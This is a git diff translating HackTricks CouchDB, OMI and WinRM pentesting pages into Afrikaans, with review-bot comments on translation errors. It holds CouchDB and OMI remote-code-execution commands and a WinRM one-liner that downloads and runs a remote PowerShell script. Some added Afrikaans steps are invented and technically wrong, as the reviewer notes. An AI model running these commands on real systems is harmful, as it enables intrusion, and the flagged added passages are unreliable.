@@ -181,15 +169,11 @@ root@canape:/home/homer/etc# ls -l -r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk -r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args ``` - -To exploit the vulnerability, a curl command is executed, targeting the `cors/origins` configuration in `local.ini`. This injects a new origin along with additional commands under the `[os_daemons]` section, aiming to execute arbitrary code: - +Om die kwesbaarheid uit te buit, word 'n curl-opdrag uitgevoer wat die `cors/origins`-konfigurasie in `local.ini` teiken. Dit voeg 'n nuwe oorsprong by, tesame met addisionele opdragte onder die `[os_daemons]`-afdeling, met die doel om willekeurige kode uit te voer: ```bash www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf" ``` - -Subsequent verification shows the injected configuration in `local.ini`, contrasting it with a backup to highlight the changes: - +Daaropvolgende verifikasie wys die geïnjecteerde konfigurasie in `local.ini`, deur dit te vergelyk met 'n rugsteun om die veranderinge te beklemtoon: ```bash root@canape:/home/homer/etc# diff local.ini local.ini.bk 119,124d118 
@@ -198,94 +182,77 @@ root@canape:/home/homer/etc# diff local.ini local.ini.bk < [os_daemons] < test_daemon = /usr/bin/touch /tmp/0xdf ``` - -Initially, the expected file (`/tmp/0xdf`) does not exist, indicating that the injected command has not been executed yet. Further investigation reveals that processes related to CouchDB are running, including one that could potentially execute the injected command: - +Aanvanklik bestaan die verwagte lêer (`/tmp/0xdf`) nie, wat aandui dat die ingeslote bevel nog nie uitgevoer is nie. Verdere ondersoek toon dat prosesse wat verband hou met CouchDB uitgevoer word, insluitend een wat moontlik die ingeslote bevel kan uitvoer: ```bash root@canape:/home/homer/bin# ps aux | grep couch ``` - -By terminating the identified CouchDB process and allowing the system to automatically restart it, the execution of the injected command is triggered, confirmed by the existence of the previously missing file: - +deur die geïdentifiseerde CouchDB-proses te beëindig en die stelsel toe te laat om dit outomaties te herlaai, word die uitvoering van die ingeslote bevel geaktiveer, bevestig deur die bestaan van die vorige ontbrekende lêer: ```bash root@canape:/home/homer/etc# kill 711 root@canape:/home/homer/etc# ls /tmp/0xdf /tmp/0xdf ``` +Hierdie verkenning bevestig die lewensvatbaarheid van CVE-2018-8007 uitbuiting onder spesifieke omstandighede, veral die vereiste vir skryftoegang tot die `local.ini` lêer. Die voorsiene kodevoorbeelde en prosedurele stappe bied 'n duidelike gids vir die herhalings van die uitbuiting in 'n beheerde omgewing. -This exploration confirms the viability of CVE-2018-8007 exploitation under specific conditions, notably the requirement for writable access to the `local.ini` file. The provided code examples and procedural steps offer a clear guide for replicating the exploit in a controlled environment. 
+Vir meer besonderhede oor CVE-2018-8007, verwys na die advies deur mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/). -For more details on CVE-2018-8007, refer to the advisory by mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/). +### **Verkenning van CVE-2017-12636 met Skryftoestemmings op local.ini** -### **Exploring CVE-2017-12636 with Write Permissions on local.ini** - -Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). - -A vulnerability known as CVE-2017-12636 was explored, which enables code execution via the CouchDB process, although specific configurations may prevent its exploitation. Despite numerous Proof of Concept (POC) references available online, adjustments are necessary to exploit the vulnerability on CouchDB version 2, differing from the commonly targeted version 1.x. The initial steps involve verifying the CouchDB version and confirming the absence of the expected query servers path: +Voorbeeld [van hier](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). +'n Kwesbaarheid bekend as CVE-2017-12636 is ondersoek, wat kodering moontlik maak via die CouchDB-proses, alhoewel spesifieke konfigurasies die uitbuiting kan voorkom. Ten spyte van talle Proof of Concept (POC) verwysings wat aanlyn beskikbaar is, is aanpassings nodig om die kwesbaarheid op CouchDB-weergawe 2 uit te buit, wat verskil van die algemeen geteikende weergawe 1.x. 
Die aanvanklike stappe behels die verifieer van die CouchDB-weergawe en die bevestiging van die afwesigheid van die verwagte vraagbedienerpad: ```bash curl http://localhost:5984 curl http://0xdf:df@localhost:5984/_config/query_servers/ ``` - -To accommodate CouchDB version 2.0, a new path is utilized: - +Om CouchDB-weergawe 2.0 te akkommodeer, word 'n nuwe pad gebruik: ```bash curl 'http://0xdf:df@localhost:5984/_membership' curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers ``` - -Attempts to add and invoke a new query server were met with permission-related errors, as indicated by the following output: - +Pogings om 'n nuwe navraagbediener by te voeg en aan te roep, is ontmoet met toestemmingsverwante foute, soos aangedui deur die volgende uitset: ```bash curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' ``` - -Further investigation revealed permission issues with the `local.ini` file, which was not writable. By modifying the file permissions with root or homer access, it became possible to proceed: - +Verdere ondersoek het toestemmingsprobleme met die `local.ini`-lêer aan die lig gebring, wat nie skryfbaar was nie. Deur die lêerregte te wysig met root- of homer-toegang, was dit moontlik om voort te gaan: ```bash cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b chmod 666 /home/homer/etc/local.ini ``` - -Subsequent attempts to add the query server succeeded, as demonstrated by the lack of error messages in the response. The successful modification of the `local.ini` file was confirmed through file comparison: - +Daaropvolgende pogings om die navraagbediener by te voeg, was suksesvol, soos gedemonstreer deur die afwesigheid van foutboodskappe in die respons. 
Die suksesvolle wysiging van die `local.ini`-lêer is bevestig deur lêervergelyking: ```bash curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' ``` - -The process continued with the creation of a database and a document, followed by an attempt to execute code via a custom view mapping to the newly added query server: - +Die proses het voortgegaan met die skep van 'n databasis en 'n dokument, gevolg deur 'n poging om kode uit te voer deur middel van 'n aangepaste aansig wat gekoppel is aan die nuut toegevoegde navraagbediener: ```bash curl -X PUT 'http://0xdf:df@localhost:5984/df' curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}' curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' ``` +'n **[opsomming](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** met 'n alternatiewe lading bied verdere insigte in die uitbuiting van CVE-2017-12636 onder spesifieke omstandighede. **Nuttige hulpbronne** vir die uitbuiting van hierdie kwesbaarheid sluit in: -A **[summary](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** with an alternative payload provides further insights into exploiting CVE-2017-12636 under specific conditions. 
**Useful resources** for exploiting this vulnerability include: - -- [POC exploit code](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py) -- [Exploit Database entry](https://www.exploit-db.com/exploits/44913/) +- [POC uitbuitingskode](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py) +- [Exploit Database inskrywing](https://www.exploit-db.com/exploits/44913/) ## Shodan * `port:5984 couchdb` -## References +## Verwysings * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) * [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien jou **maatskappy geadverteer in HackTricks** of **HackTricks aflaai in PDF** Kyk die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
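Review bot: `+'n Kwesbaarheid bekend as CVE-2017-12636 is ondersoek, wat kodering moontlik maak via die CouchDB-proses` mistranslates "enables code execution"; "kodering" means coding or encoding, so it should read "wat kode-uitvoering via die CouchDB-proses moontlik maak". Two smaller points in the same hunk: `+deur die geïdentifiseerde CouchDB-proses te beëindig ...` starts a sentence in lower case (the source began with "By"), and the terminology drifts between "ingeslote bevel" / "geïnjecteerde konfigurasie" for "injected" and "vraagbedienerpad" / "navraagbediener" for "query server"; pick one rendering of each. The blank line between `+Voorbeeld [van hier](...)` and the following paragraph is also lost, which merges them into one paragraph when rendered.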
diff --git a/network-services-pentesting/5985-5986-pentesting-omi.md b/network-services-pentesting/5985-5986-pentesting-omi.md index 3204956bc..7bb76eb2a 100644 --- a/network-services-pentesting/5985-5986-pentesting-omi.md +++ b/network-services-pentesting/5985-5986-pentesting-omi.md @@ -2,19 +2,19 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-### **Basic Information** +### **Basiese Inligting** -**OMI** is presented as an **[open-source](https://github.com/microsoft/omi)** tool by Microsoft, designed for remote configuration management. It's particularly relevant for Linux servers on Azure that utilize services such as: +**OMI** word aangebied as 'n **[open-source](https://github.com/microsoft/omi)**-instrument deur Microsoft, ontwerp vir afstandsbeheer van konfigurasie. Dit is veral relevant vir Linux-bedieners op Azure wat dienste soos gebruik: - **Azure Automation** - **Azure Automatic Update** 
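Review bot: word order is broken in `+... Dit is veral relevant vir Linux-bedieners op Azure wat dienste soos gebruik:`; the source "that utilize services such as:" should become "wat dienste soos die volgende gebruik:" so the sentence leads into the bullet list that follows.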
@@ -23,43 +23,41 @@ - **Azure Configuration Management** - **Azure Diagnostics** -The process `omiengine` is initiated and listens on all interfaces as root when these services are activated. +Die proses `omiengine` word geïnisieer en luister op alle koppelvlakke as root wanneer hierdie dienste geaktiveer word. -**Default ports** used are **5985** (http) and **5986** (https). +**Verstekpoorte** wat gebruik word, is **5985** (http) en **5986** (https). -### **[CVE-2021-38647 Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)** +### **[CVE-2021-38647 Swakplek](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)** -As observed on September 16, Linux servers deployed in Azure with the mentioned services are susceptible due to a vulnerable version of OMI. This vulnerability lies in the OMI server's handling of messages through the `/wsman` endpoint without requiring an Authentication header, incorrectly authorizing the client. - -An attacker can exploit this by sending an "ExecuteShellCommand" SOAP payload without an Authentication header, compelling the server to execute commands with root privileges. +Soos waargeneem op 16 September, is Linux-bedieners wat in Azure geïmplementeer is met die genoemde dienste vatbaar as gevolg van 'n kwesbare weergawe van OMI. Hierdie kwesbaarheid lê in die OMI-bediener se hantering van boodskappe deur die `/wsman` eindpunt sonder 'n Verifikasie-heer, wat die kliënt verkeerd magtig. +'n Aanvaller kan dit uitbuit deur 'n "ExecuteShellCommand" SOAP-lading sonder 'n Verifikasie-heer te stuur, wat die bediener dwing om opdragte met root-voorregte uit te voer. ```xml - - id - 0 - - +... + + +id +0 + + ``` +Vir meer inligting oor hierdie CVE **[kyk hier](https://github.com/horizon3ai/CVE-2021-38647)**. -For a more information about this CVE **[check this](https://github.com/horizon3ai/CVE-2021-38647)**. 
- -## References +## Verwysings * [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/) * [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
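Review bot: the ```xml code block is modified in this hunk: the indented original lines (`- - id - 0 - -`) are replaced by unindented `+id` / `+0` lines and a new `+...` line, so the SOAP fragment's structure is altered. A translation commit should leave code blocks byte-identical; revert the block to the original lines. Also, `sonder 'n Verifikasie-heer` is a mistranslation of "without an Authentication header" ("heer" means lord); use "sonder 'n Authentication-kop" or keep the English term "Authentication header". The heading `+### **[CVE-2021-38647 Swakplek]...` uses "Swakplek" while the body uses "kwesbaarheid"; keep "Kwesbaarheid" in both.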
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index 454ac692a..48d4485df 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -2,114 +2,116 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbounties wat begin en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! ## WinRM -[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) is highlighted as a **protocol by Microsoft** that enables the **remote management of Windows systems** through HTTP(S), leveraging SOAP in the process. It's fundamentally powered by WMI, presenting itself as an HTTP-based interface for WMI operations. +[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) word uitgelig as 'n **protokol deur Microsoft** wat die **afstandsbestuur van Windows-stelsels** deur middel van HTTP(S) moontlik maak, met behulp van SOAP in die proses. Dit word fundamenteel aangedryf deur WMI en bied 'n HTTP-gebaseerde koppelvlak vir WMI-operasies. 
-The presence of WinRM on a machine allows for straightforward remote administration via PowerShell, akin to how SSH works for other operating systems. To determine if WinRM is operational, checking for the opening of specific ports is recommended: +Die teenwoordigheid van WinRM op 'n masjien maak dit moontlik vir eenvoudige afstandsadministrasie via PowerShell, soortgelyk aan hoe SSH werk vir ander bedryfstelsels. Om vas te stel of WinRM operasioneel is, word aanbeveel om te kyk of spesifieke poorte oopgemaak is: * **5985/tcp (HTTP)** * **5986/tcp (HTTPS)** -An open port from the list above signifies that WinRM has been set up, thus permitting attempts to initiate a remote session. +'n Oop poort van die lys hierbo beteken dat WinRM opgestel is en dus pogings toelaat om 'n afstandsverbinding te begin. -### **Initiating a WinRM Session** - -To configure PowerShell for WinRM, Microsoft's `Enable-PSRemoting` cmdlet comes into play, setting up the computer to accept remote PowerShell commands. With elevated PowerShell access, the following commands can be executed to enable this functionality and designate any host as trusted: +### **Die begin van 'n WinRM-sessie** +Om PowerShell te konfigureer vir WinRM, kom Microsoft se `Enable-PSRemoting` cmdlet in die prentjie, wat die rekenaar opstel om afstands-PowerShell-opdragte te aanvaar. Met verhoogde toegang tot PowerShell kan die volgende opdragte uitgevoer word om hierdie funksionaliteit in te skakel en enige gasheer as betroubaar aan te dui: ```powershell -Enable-PSRemoting -Force -Set-Item wsman:\localhost\client\trustedhosts * +Enable-PSRemoting -Force +Set-Item wsman:\localhost\client\trustedhosts * ``` +Hierdie benadering behels die byvoeging van 'n wildkaart by die `trustedhosts`-konfigurasie, 'n stap wat versigtige oorweging vereis as gevolg van die implikasies daarvan. Dit word ook opgemerk dat dit moontlik nodig kan wees om die netwerk tipe van "Public" na "Work" te verander op die aanvaller se masjien. 
-This approach involves adding a wildcard to the `trustedhosts` configuration, a step that requires cautious consideration due to its implications. It's also noted that altering the network type from "Public" to "Work" might be necessary on the attacker's machine. - -Moreover, WinRM can be **activated remotely** using the `wmic` command, demonstrated as follows: - +Verder kan WinRM **afstandaktivering** gebruik deur die `wmic`-opdrag, soos volg, te demonstreer: ```powershell wmic /node: process call create "powershell enable-psremoting -force" ``` - -This method allows for the remote setup of WinRM, enhancing the flexibility in managing Windows machines from afar. +Hierdie metode maak dit moontlik om WinRM vanaf 'n afstand op te stel, wat die buigsaamheid in die bestuur van Windows-masjiene verbeter. -### Test if configured +### Toets of dit gekonfigureer is -To verify the setup of your attack machine, the `Test-WSMan` command is utilized to check if the target has WinRM configured properly. By executing this command, you should expect to receive details concerning the protocol version and wsmid, indicating successful configuration. Below are examples demonstrating the expected output for a configured target versus an unconfigured one: - -- For a target that **is** properly configured, the output will look similar to this: +Om die opset van jou aanvalsmasjien te verifieer, word die `Test-WSMan`-opdrag gebruik om te kyk of die teiken WinRM korrek gekonfigureer het. Deur hierdie opdrag uit te voer, kan jy verwag om besonderhede oor die protokolweergawe en wsmid te ontvang, wat suksesvolle konfigurasie aandui. 
Hieronder is voorbeelde wat die verwagte uitset vir 'n gekonfigureerde teiken teenoor 'n ongekonfigureerde een demonstreer: +- Vir 'n teiken wat **korrek** gekonfigureer is, sal die uitset soortgelyk lyk aan die volgende: ```bash Test-WSMan ``` - -The response should contain information about the protocol version and wsmid, signifying that WinRM is set up correctly. +Die reaksie moet inligting bevat oor die protokolweergawe en wsmid, wat aandui dat WinRM korrek opgestel is. ![](<../.gitbook/assets/image (161) (1).png>) -- Conversely, for a target **not** configured for WinRM, the would result in no such detailed information, highlighting the absence of a proper WinRM setup. +- Omgekeerd, vir 'n teiken wat **nie** vir WinRM opgestel is nie, sal daar geen sulke gedetailleerde inligting wees nie, wat die afwesigheid van 'n korrekte WinRM-opstelling beklemtoon. ![](<../.gitbook/assets/image (162).png>) -### Execute a command - -To execute `ipconfig` remotely on a target machine and view its output do: +### Voer 'n bevel uit +Om `ipconfig` op 'n teikenrekenaar uit te voer en die uitset te sien, doen die volgende: ```powershell Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username] ``` - ![](<../.gitbook/assets/image (163) (1).png>) -You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do: - +Jy kan ook **'n bevel van jou huidige PS-konsole uitvoer** deur gebruik te maak van _**Invoke-Command**_. 
Stel dat jy plaaslik 'n funksie genaamd _**enumeration**_ het en jy wil dit op 'n afgeleë rekenaar uitvoer, kan jy dit doen: ```powershell Invoke-Command -ComputerName -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"] ``` +### Voer 'n Skrip uit -### Execute a Script +Om 'n skrip uit te voer op 'n Windows Remote Management (WinRM) diens, kan jy die volgende stappe volg: +1. Verbind na die doelwitbediener met behulp van 'n WinRM-kliënt soos `winrs` of `Enter-PSSession`. +2. Skep 'n nuwe skripslêer op die doelwitbediener met die gewenste skriptekode. +3. Voer die skrip uit deur die pad na die skripslêer op te gee, byvoorbeeld `.\skripsnaam.ps1`. + +Dit sal die skrip op die doelwitbediener uitvoer en die resultate terugstuur na jou WinRM-kliënt. Onthou om die nodige toestemmings en regte te hê om skripte op die doelwitbediener uit te voer. ```powershell Invoke-Command -ComputerName -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta] ``` +### Kry 'n omgekeerde dop -### Get reverse-shell +Om 'n omgekeerde dop te kry, kan jy die volgende stappe volg: +1. Skep 'n omgekeerde dop-skripsie wat sal hardloop op die doelwitbediener. Hierdie skripsie moet 'n verbinding maak met jou aanvalsmasjien en 'n omgekeerde dop daarop vestig. +2. Stuur die omgekeerde dop-skripsie na die doelwitbediener. Dit kan gedoen word deur dit te laai op 'n webwerf, dit as 'n e-posbylaag te stuur of dit op 'n ander manier op die doelwitbediener te plaas. +3. Wanneer die doelwitbediener die omgekeerde dop-skripsie uitvoer, sal dit 'n verbinding maak met jou aanvalsmasjien en 'n omgekeerde dop daarop vestig. +4. Jy kan nou op afstand die doelwitbediener se stelsel beheer deur die omgekeerde dop te gebruik. + +Dit is belangrik om te onthou dat die gebruik van omgekeerde dopskripsies om toegang tot stelsels te verkry sonder toestemming onwettig is en 'n oortreding van die wet kan wees. Dit moet slegs gedoen word in 'n wettige en etiese pentesting-konteks. 
```powershell Invoke-Command -ComputerName -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"} ``` +### Kry 'n PS-sessie -### Get a PS session - -To get an interactive PowerShell shell use `Enter-PSSession`: - +Om 'n interaktiewe PowerShell-skaal te kry, gebruik `Enter-PSSession`: ```powershell #If you need to use different creds $password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force 
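Review bot: this hunk adds text that has no counterpart in the English source and is technically wrong. Under `+### Voer 'n Skrip uit`, the added steps say to create the script file on the target (`+2. Skep 'n nuwe skripslêer op die doelwitbediener ...`), but the command that follows, `Invoke-Command -ComputerName -FilePath C:\path\to\script\file`, reads the script from the local machine and ships its contents to the remote session. Under `+### Kry 'n omgekeerde dop`, the four added steps (e-mail attachment, hosting on a website) describe nothing that the single `Invoke-Command` line does, and the closing sentence about legality is not in the original page's register. Keep only the translated heading plus the unchanged code, as the source has. Two further points: `+Verder kan WinRM **afstandaktivering** gebruik deur die \`wmic\`-opdrag, soos volg, te demonstreer:` garbles "WinRM can be activated remotely using the wmic command, demonstrated as follows"; suggest "Verder kan WinRM **op afstand geaktiveer** word met die `wmic`-opdrag, soos volg:". And the `Enable-PSRemoting -Force` / `Set-Item wsman:\localhost\client\trustedhosts *` lines are removed and re-added with no visible change, which looks like a whitespace-only edit inside a code block; drop it from the translation commit.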
@@ -120,29 +122,25 @@ $creds2=New-Object System.Management.Automation.PSCredential(".\student41", $pas Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username] ## Bypass proxy Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) -# Save session in var +# Save session in var $sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) Enter-PSSession $sess ## Background current PS session Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...) ``` - ![](<../.gitbook/assets/image (164).png>) -**The session will run in a new process (wsmprovhost) inside the "victim"** +**Die sessie sal in 'n nuwe proses (wsmprovhost) binne die "slagoffer" loop** -### **Forcing WinRM Open** - -To use PS Remoting and WinRM but the computer isn't configured, you could enable it with: +### **WinRM Oop Forseer** +Om PS Remoting en WinRM te gebruik, maar as die rekenaar nie gekonfigureer is nie, kan jy dit aktiveer met: ```powershell .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force" ``` +### Stoor en Herstel sessies -### Saving and 